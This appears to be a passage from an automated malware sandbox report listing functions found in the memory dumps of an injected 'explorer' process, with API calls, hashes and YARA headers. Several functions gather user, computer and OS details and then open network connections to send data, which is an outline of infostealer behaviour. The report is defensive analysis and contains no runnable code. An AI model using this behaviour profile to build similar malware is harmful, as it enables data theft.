                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB41C433308B9485DB25CF21F4903AEB7A5F785754F845626DE8A43798EBBCC595C700
                                                                                                                                                                                                                        Function 0FF49F50 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isprint$strstr
                                                                                                                                                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                        • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                        • Opcode ID: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction ID: 1dfb9e74ca4fc2dc105176cbbb0a75f7ea08265d4e977d74b2f631827c15d22b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041D727708B8585DB208F25F4403BABBA5FB89B54FC45225DE8A4375AEB7CE095D700
                                                                                                                                                                                                                        Function 0DFA4390 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA4550: isdigit.MSVCRT ref: 0DFA4577
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0DFA4408
                                                                                                                                                                                                                          • Part of subcall function 0DFA41F0: malloc.MSVCRT ref: 0DFA4200
                                                                                                                                                                                                                          • Part of subcall function 0DFA41F0: free.MSVCRT ref: 0DFA4220
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DFA4489
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DFA448F
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0DFA44AD
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DFA450A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction ID: 5b7e74a6e8936d41797c2edcfb5c2c181b13c0f5406ed802fdd45674572bfb13
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF41D0B2604B518AEB21DF6DE84472A7BA5F384B91F01C026DE4A43764EFBDC585CB90
                                                                                                                                                                                                                        Function 0E104390 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E104550: isdigit.MSVCRT ref: 0E104577
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0E104408
                                                                                                                                                                                                                          • Part of subcall function 0E1041F0: malloc.MSVCRT ref: 0E104200
                                                                                                                                                                                                                          • Part of subcall function 0E1041F0: free.MSVCRT ref: 0E104220
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0E104489
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0E10448F
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0E1044AD
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0E10450A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction ID: a5b175af7a75fe032db69ef4f636ed181c6dc0c3ba6eef601422614f894045e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8241F4B2614B9186EB21DF22E99471E77E1F748B90F418416EF5643798EBBCC8C1CB80
                                                                                                                                                                                                                        Function 0FF44390 Relevance: 13.6, APIs: 9, Instructions: 120stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF44550: isdigit.MSVCRT ref: 0FF44577
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0FF44408
                                                                                                                                                                                                                          • Part of subcall function 0FF441F0: malloc.MSVCRT ref: 0FF44200
                                                                                                                                                                                                                          • Part of subcall function 0FF441F0: free.MSVCRT ref: 0FF44220
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0FF44489
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0FF4448F
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0FF444AD
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0FF4450A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction ID: d9f4933f81488437c749449d55806edc85911c5d9845b773f9db8f69372f129a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2941D072604B5286EB21DF21E84472A7AA1FB84FD0F818122DE5657B59EF3DE085CB80
                                                                                                                                                                                                                        Function 0E108FA0 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0E108FE8
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0E108FF5
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0E10902A
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetWindowsDirectoryA.KERNEL32 ref: 0E109B7C
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetVolumeInformationA.KERNEL32 ref: 0E109BC6
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: wsprintfA.USER32 ref: 0E109C27
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0E10904D
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10905D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0E1090F4
                                                                                                                                                                                                                          • Part of subcall function 0E1091C0: EnterCriticalSection.KERNEL32 ref: 0E1091CB
                                                                                                                                                                                                                          • Part of subcall function 0E1091C0: LeaveCriticalSection.KERNEL32 ref: 0E1091FB
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: send.WS2_32 ref: 0E10703C
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: recv.WS2_32 ref: 0E1070A3
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcmpiA.KERNEL32 ref: 0E107103
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrlenA.KERNEL32 ref: 0E107127
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: StrStrA.SHLWAPI ref: 0E10713F
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcmpiA.KERNEL32 ref: 0E10715E
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: strtol.MSVCRT ref: 0E107176
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10906D
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcpyA.KERNEL32 ref: 0E106E6E
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E7F
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E93
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EA7
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EB8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106ECC
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EEA
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: wsprintfA.USER32 ref: 0E106F02
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F16
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F2A
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F66
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: WSAStartup.WS2_32 ref: 0E106F76
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: socket.WS2_32 ref: 0E106F92
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: gethostbyname.WS2_32 ref: 0E106FA9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: memcpy.MSVCRT ref: 0E106FC9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: htons.WS2_32 ref: 0E106FD8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: connect.WS2_32 ref: 0E106FEF
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrlenA.KERNEL32 ref: 0E107005
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: send.WS2_32 ref: 0E10701B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0E10910C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0E10911A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1973528353-0
                                                                                                                                                                                                                        • Opcode ID: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction ID: 1e0a4efa4fab683054b989449d7614d36b05457d309474721dfd2c9f1b591178
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E5128B1316BC0A6EB00DB22F85439A73E5F788B94F500815DA8E97BA4DF7CC599CB41
                                                                                                                                                                                                                        Function 0FF48FA0 Relevance: 13.6, APIs: 9, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0FF48FE8
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0FF48FF5
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0FF4902A
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetWindowsDirectoryA.KERNEL32 ref: 0FF49B7C
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetVolumeInformationA.KERNEL32 ref: 0FF49BC6
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: wsprintfA.USER32 ref: 0FF49C27
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0FF4904D
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4905D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0FF490F4
                                                                                                                                                                                                                          • Part of subcall function 0FF491C0: EnterCriticalSection.KERNEL32 ref: 0FF491CB
                                                                                                                                                                                                                          • Part of subcall function 0FF491C0: LeaveCriticalSection.KERNEL32 ref: 0FF491FB
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: send.WS2_32 ref: 0FF4703C
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: recv.WS2_32 ref: 0FF470A3
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcmpiA.KERNEL32 ref: 0FF47103
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrlenA.KERNEL32 ref: 0FF47127
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: StrStrA.SHLWAPI ref: 0FF4713F
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcmpiA.KERNEL32 ref: 0FF4715E
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: strtol.MSVCRT ref: 0FF47176
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4906D
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcpyA.KERNEL32 ref: 0FF46E6E
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E7F
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E93
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EA7
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EB8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46ECC
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EEA
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: wsprintfA.USER32 ref: 0FF46F02
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F16
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F2A
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F66
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: WSAStartup.WS2_32 ref: 0FF46F76
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: socket.WS2_32 ref: 0FF46F92
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: gethostbyname.WS2_32 ref: 0FF46FA9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: memcpy.MSVCRT ref: 0FF46FC9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: htons.WS2_32 ref: 0FF46FD8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: connect.WS2_32 ref: 0FF46FEF
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrlenA.KERNEL32 ref: 0FF47005
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: send.WS2_32 ref: 0FF4701B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0FF4910C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0FF4911A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1973528353-0
                                                                                                                                                                                                                        • Opcode ID: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction ID: 4dd38fde4c5667a35ad55528c40b655ea33c1a55b9e2eacc13a5edab2e9d7c4f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E451D135605B4785EB20DB25E89437A77A4FB89BC4F800236DA8987B24DF7CD15BDB40
                                                                                                                                                                                                                        Function 0DEF0A65 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: a80589b90b621c0618080cd88d681040ccaf4018dd47b05b026ee75687cf3ab5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C316679269D4A8FFB78EB58ECA4B7933E0F758329F54A1188609C21E1CE3CD4569700
                                                                                                                                                                                                                        Function 08240A65 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: cab110a2110d980ed3924558977509681009355a94354ae22844ecfa3d8386b6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48317678279D5B8FEBECEB58D8A4B6932A0F758317F54501C8615C22A0CE3C949B9B10
                                                                                                                                                                                                                        Function 0E0A0A65 Relevance: 12.6, APIs: 10, Instructions: 108COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: 5b734d5a0f6c52a041d3e03d1f4d79bf759c63d767782e29b10bbc9178888bf7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2314634269D5E8FFFB8EF98E8B4BA932E0F758355F5884198509C31A0CF3C9856A741
                                                                                                                                                                                                                        Function 0E10A990 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0E10AA49
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0E10AA63
                                                                                                                                                                                                                          • Part of subcall function 0E10A350: WideCharToMultiByte.KERNEL32 ref: 0E10A393
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0E10AA8C
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0E10AA9D
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0E10AAED
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: EnterCriticalSection.KERNEL32 ref: 0E108FE8
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: RtlInitializeCriticalSection.NTDLL ref: 0E108FF5
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10902A
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10904D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10905D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10906D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: LeaveCriticalSection.KERNEL32 ref: 0E1090F4
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: memcpy.MSVCRT ref: 0E10910C
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrlenA.KERNEL32 ref: 0E10911A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10AB01
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.6
                                                                                                                                                                                                                        • API String ID: 2800961625-471037017
                                                                                                                                                                                                                        • Opcode ID: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction ID: 9707e8539c9c314c79902ddecb549d58be026afb700705644e1d55ad29089d01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69417F72614B809AE720DF71E8443DEB7A4FB88788F844416EB4D57B98DFB9C645CB40
                                                                                                                                                                                                                        Function 0FF4A990 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0FF4AA49
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0FF4AA63
                                                                                                                                                                                                                          • Part of subcall function 0FF4A350: WideCharToMultiByte.KERNEL32 ref: 0FF4A393
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0FF4AA8C
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0FF4AA9D
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0FF4AAED
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: EnterCriticalSection.KERNEL32 ref: 0FF48FE8
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: RtlInitializeCriticalSection.NTDLL ref: 0FF48FF5
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4902A
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4904D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4905D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4906D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: LeaveCriticalSection.KERNEL32 ref: 0FF490F4
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: memcpy.MSVCRT ref: 0FF4910C
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrlenA.KERNEL32 ref: 0FF4911A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4AB01
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
